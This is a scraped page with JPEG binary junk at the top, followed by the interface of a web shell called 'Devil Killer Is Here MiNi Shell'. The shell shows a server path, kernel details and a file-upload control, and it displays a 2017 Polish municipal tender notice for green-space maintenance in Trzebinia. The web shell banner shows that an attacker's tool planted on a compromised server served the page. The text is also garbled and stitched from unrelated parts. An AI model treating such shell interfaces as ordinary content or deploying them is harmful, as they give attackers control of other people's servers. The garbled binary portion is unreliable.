JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170131/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20170131/17395-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.trzebinia.pl / BIP' target='_blank'>http://www.trzebinia.pl / BIP</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 17395 - 2017
              z dnia 2017-01-31 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Trzebinia: Utrzymanie terenów zieleni miejskiej w Gminie Trzebinia
 w 2017 r.  sektorach:
A na pow.  13,84 ha
B na pow.   8,35 ha
C na pow.   9,16 ha
D na pow.  10,57 ha
E na pow.   0,21 ha
<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Trzebinia, krajowy numer identyfikacyjny
              52723300000, ul.
              ul. Józefa Piłsudskiego 
              14,
              32540  
              Trzebinia, woj.
              małopolskie, państwo
              Polska, tel.
              326 121 227, e-mail
              urzad@um.trzebinia.pl, faks
              326 121 147.
              <br />
              Adres strony internetowej (URL): www.trzebinia.pl / BIP<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.trzebinia.pl / BIP</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.trzebinia.pl / BIP</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />w wersji papierowe z zachowaniem formy pisemnej, przesłane oferty pocztą, kurierem, dostarczenie osobiście<br />
                Adres:
                <br />Urząd Miasta w Trzebini, ul. Marszałka Piłsudskiego 14, Wydział Gospodarki Komunalnej, Ochrony Środowiska, Rolnictwa i Leśnictwa, pokój nr 40</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Utrzymanie terenów zieleni miejskiej w Gminie Trzebinia
 w 2017 r.  sektorach:
A na pow.  13,84 ha
B na pow.   8,35 ha
C na pow.   9,16 ha
D na pow.  10,57 ha
E na pow.   0,21 ha
<br /><b>Numer referencyjny: </b>GK.KGK.271.1.2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  
                    maksymalnej liczby części 2<br /></div><b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b><br />2<br /><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Zakres prac obejmuje:
wygrabienie liści z trawników, krzewów i żywopłotów, systematyczne zgrabianie i wywożenie liści
z trawników oraz przyległych chodników w sezonie jesiennym i wiosennym, koszenie trawników, grabienie i pielęgnacja trawników, wysiew nawozów mineralnych, przygotowanie gleby pod obsadzenia, obsadzanie kwietników oraz ich pielęgnacja, pielęgnację skupin krzewów, bylin
i kwietników, cięcia pielęgnacyjne i odmładzające krzewów oraz żywopłotów, pielęgnacja drzew
i krzewów, bieżące utrzymanie terenów zieleni w czystości itp.

Wymagania dotyczące wykonywania zamówienia:
Prace powinny być wykonywane tak, aby zapewniona była możliwość bezpiecznego poruszania się po terenie objętym zamówieniem. Ponadto zabrania się Wykonawcy wprowadzania na trawniki                i chodniki przyległe sprzętu mechanicznego o masie całkowitej powyżej jednej tony, dopuszcza się ruch sprzętem typu kosiarki samojezdne ogrodowe (traktorki), których tonaż nie przekracza jednej tony.

Na terenie chodników i zieleni gminnej Trzebini zabrania się poruszania  pojazdów mechanicznych oraz maszyn samobieżnych o masie całkowitej powyżej 1 tony
Wszelkie szkody powstałe na skutek realizacji niniejszego zamówienia pokrywa Wykonawca.

Wszystkie prace należy wykonać zgodnie z określonymi przez Zamawiającego Standardami i metodami  prac w ramach utrzymania zieleni miejskiej  załącznik nr 4 do siwz.

Szczegółowy zakres prac w sektorach: A, B, C, D i E określa przedmiar prac. 

Stosownie do treści art. 29 ust. 3a ustawy Pzp Zamawiający wymaga zatrudnienia przez 
Wykonawcę lub Podwykonawcę w każdym sektorze osobno na podstawie umowy o pracę 4 osób bezpośrednio wykonujących przedmiot zamówienia określony w pkt. 3 ( nie dotyczy brygadzisty).
Powyższy wymóg określony w punkcie 3.1 dotyczy również ewentualnych podwykonawców wykonujących wskazane wyżej prace (art. 29 ust. 3a ustawy Pzp).
<br /><br /><b>II.5) Główny kod CPV: </b>77300000-3<br /><b> Dodatkowe kody CPV:</b>77310000-6,
                77313000-7,
                90511300-5<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 31/12/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b>Zamawiający dopuszcza składanie ofert częściowych:
- utrzymanie zieleni w sektorze  A na pow. 13,84 ha
- utrzymanie zieleni w sektorze B na pow.    8,35 ha
- utrzymanie zieleni w sektorze C na pow.    9,16 ha
- utrzymanie zieleni w sektorze D na pow.  10,57 ha
- utrzymanie zieleni w sektorze  E na pow.   0,21 ha

Wybór oferty najkorzystniejszej nastąpi oddzielnie dla każdej części zamówienia .

Każdy Wykonawca może złożyć ofertę maksymalnie na dwa sektory.

W przypadku gdy Wykonawca składa ofertę na więcej niż jedną cześć wymagania dotyczące spełnienia warunku dotyczącego dysponowania osobami i sprzętem musi zapewnić na każdą cześć oddzielnie.

Uwaga.
Zamawiający nie dopuszcza wskazania tych samych osób i sprzętu w więcej niż jednym sektorze.
</div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Warunek zdolności technicznej lub zawodowej.

O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy wykażą, że:
- wykonali lub wykonują  należycie min. 2 usługi polegające na  pielęgnacji zieleni na powierzchni nie mniejszej łącznie niż 7 ha w jednym okresie wegetacyjnym tzn. przez co najmniej sześć miesięcy w okresie ostatnich 3 lat, a jeżeli okres prowadzenia jest krótszy to w tym okresie.
oraz 
- dysponują min. 4 osobami do  bezpośredniej realizacji przedmiotu zamówienia określonego w pkt. 3 siwz ( dla każdego sektora osobno).
oraz dysponują min. jedną osobą (np. brygadzistą)  posiadającą wykształcenie wyższe lub średnie o profilu zgodnym z przedmiotem zamówienie (np. ogrodnicze, architektura krajobrazu) jako osobą nadzorującą pracę osób bezpośrednio zaangażowanych przy realizacji zamówienia
oraz dysponują 
- dla sektora A 
min.: trzema kosiarkami spalinowymi, jedną piłą mechaniczną, jednymi nożycami spalinowymi i dwoma szt. nożyc ręcznych (do żywopłotów), czterema kosami spalinowymi,  jedną dmuchawą do liści, jednym ciągnikiem rolniczym z przyczepą lub samochodem ciężarowym o ładowności do 3,5 t. oraz narzędziami ręcznymi typu: szpadle, grabie, motyczki, sekatory itp.
- dla sektora B 
min.: dwoma kosiarkami spalinowymi, jedną piłą mechaniczną, jednymi nożycami spalinowymi i jedną szt. nożyc ręcznych (do żywopłotów), trzema kosami spalinowymi, jedną dmuchawę do liści, jednym ciągnikiem rolniczym z przyczepą lub samochodem ciężarowym o ładowności do 3,5 t. oraz narzędziami ręcznymi typu: szpadle, grabie, motyczki, sekatory itp.
 - dla sektora C 
min.: dwoma kosiarkami spalinowymi, jedną piłę mechaniczną, jednymi nożycami spalinowymi i dwoma szt. nożyc ręcznych (do żywopłotów), trzema kosami spalinowymi, jednym opryskiwaczem plecakowym, jedną dmuchawą do liści, jednym ciągnikiem rolniczym z przyczepą lub samochodem ciężarowym o ładowności do 3,5 t. oraz narzędziami ręcznymi typu: szpadle, grabie, motyczki, sekatory itp.
- dla sektora D 
min.: dwoma kosiarkami spalinowymi, jedną piłą mechaniczną, jednymi nożycami spalinowymi i dwoma szt. nożyc ręcznych (do żywopłotów), trzema kosami spalinowymi, jednym opryskiwaczem plecakowym, jedną dmuchawę do liści, jednym ciągnikiem rolniczym z przyczepą lub samochodem ciężarowym o ładowności do3,5 t. oraz narzędziami ręcznymi typu: szpadle, grabie, motyczki, sekatory itp.
 - dla sektora E 
min.: jedną kosiarką spalinową, jedną piłą mechaniczną, jednymi nożycami spalinowymi i jedną szt. nożyc ręcznych (do żywopłotów), jedną kosą spalinową, jedną dmuchawą do liści, jednym ciągnikiem rolniczym z przyczepą lub samochodem ciężarowym o ładowności do3,5 t. oraz narzędziami ręcznymi typu: szpadle, grabie, motyczki, sekatory itp.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                Nie później niż w dniu podpisania umowy Wykonawca, którego oferta zostanie wybrana winien przedłożyć zaświadczenie o dokonaniu wpisu w rejestrze działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości z terenu gminy Trzebinia oraz zezwolenie na transport tych odpadów lub
umowę z przedsiębiorcą prowadzącym działalność w zakresie odbierania odpadów komunalnych i posiadającym wpis w rejestrze działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości z terenu gminy Trzebinia oraz zezwolenie na transport tych odpadów.
Nie później niż w dniu podpisania umowy Wykonawca, którego oferta zostanie wybrana winien przedstawić polisę lub inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 100 000,00 zł.
Nie później niż w dniu podpisania umowy Wykonawca, którego oferta zostanie wybrana winien wskazać minimum jeden nr telefonu, do osoby odpowiedzialnej za realizację umowy, który będzie dostępny dla Zamawiającego celem przekazywania bieżących uwag   i dyspozycji.
 </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">Aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności
    gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu
     potwierdzenia braku podstaw do wykluczenia w oparciu o art. 24 ust. 5 pkt. 1 ustawy;
b) Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej
     Polskiej, zamiast aktualnego odpisu, o którym mowa wyżej, składa dokument lub dokumenty
     wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające
    odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości, wystawione nie
     wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
c) Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce
      zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których mowa
     wyżej, zastępuje się je dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze
     wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której
     dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym,
     administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze
     względu na siedzibę lub miejsce zamieszkania wykonawcy lub miejsce zamieszkania tej osoby,
    wystawionym nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
d) Wykonawca nie jest obowiązany do złożenia oświadczeń lub dokumentów, o których mowa w
     ppkt. a-c, jeżeli zamawiający posiada oświadczenia lub dokumenty dotyczące tego wykonawcy lub
    może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności
     rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności
     podmiotów realizujących zadania publiczne (Dz. U. z 2014 r. poz. 1114 oraz z 2016 r. poz. 352).
 e) W przypadku wskazania przez wykonawcę dostępności oświadczeń lub dokumentów, o których
    mowa w ppkt. a-c, w formie elektronicznej pod określonymi adresami internetowymi
    ogólnodostępnych i bezpłatnych baz danych, zamawiający pobierze samodzielnie z tych baz
    danych wskazane przez wykonawcę oświadczenia lub dokumenty.
f) W przypadku wskazania przez wykonawcę oświadczeń lub dokumentów, o których mowa w ppkt.
     a-c, które znajdują się w posiadaniu zamawiającego, w szczególności oświadczeń lub dokumentów
    przechowywanych przez zamawiającego zgodnie z art. 97 ust. 1 ustawy, zamawiający w celu
    potwierdzenia okoliczności, o których mowa w art. 25 ust. 1 pkt 1 i 3 ustawy, korzysta
    z posiadanych oświadczeń lub dokumentów, o ile są one aktualne.
g ) Na żądanie Zamawiającego, Wykonawca, który polega na zdolnościach lub sytuacji innych
      podmiotów na zasadach określonych w art. 22a ustawy oraz wskaże w ofercie wykonanie części
      zamówienia przez podwykonawcę , zobowiązany będzie do przedstawienia zamawiającemu  w
      odniesieniu do tych podmiotów i podwykonawców ich oświadczeń o niepodleganiu wykluczeniu
     z postępowania.
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />a)	Wykaz usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane oraz załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie.
Dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów  oświadczenie Wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert - - załącznik nr 6.

b)	wykazu narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych wykonawcy w celu   wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami- załącznik nr 7.
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">a)	Pełnomocnictwo do reprezentowania  Wykonawcy w postępowaniu o udzielenie zamówienia publicznego w przypadku gdy nie wynika ono z wpisu do KRS lub wpisu do CEIDG  należy złożyć wraz z ofertą.
b)	Pełnomocnictwo w przypadku podmiotów występujących wspólnie - należy złożyć wraz z ofertą.
c)	Zobowiązanie podmiotu trzeciego do oddania do dyspozycji wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia zgodnie z art. 22a ustawy Pzp - należy złożyć wraz z ofertą.
d)	 W celu oceny, czy wykonawca polegając na zdolnościach lub sytuacji innych podmiotów na zasadach określonych w art. 22a ustawy Pzp, będzie dysponował niezbędnymi zasobami w stopniu umożliwiającym należyte wykonanie zamówienia publicznego oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, Wykonawca na wezwanie  Zamawiającego przedłoży dokumenty, które będą określały w szczególności: 
1) zakres dostępnych wykonawcy zasobów innego podmiotu; 
2) sposób wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia publicznego; 
3) zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia publicznego
4) czy podmiot, na zdolnościach którego wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane lub usługi, których wskazane zdolności dotyczą. 
Powyższe informacje mogą wynikać między innymi z umów cywilno-prawnych (np. zlecenia, najmu, dzierżawy).
  e)Wykonawca który polega na zdolnościach innych podmiotów na zasadach
      określonych w art. 22a ustawy Pzp na wezwanie  Zamawiającego przedłoży dokument wskazany
     w pkt.6.1 ppkt.a  
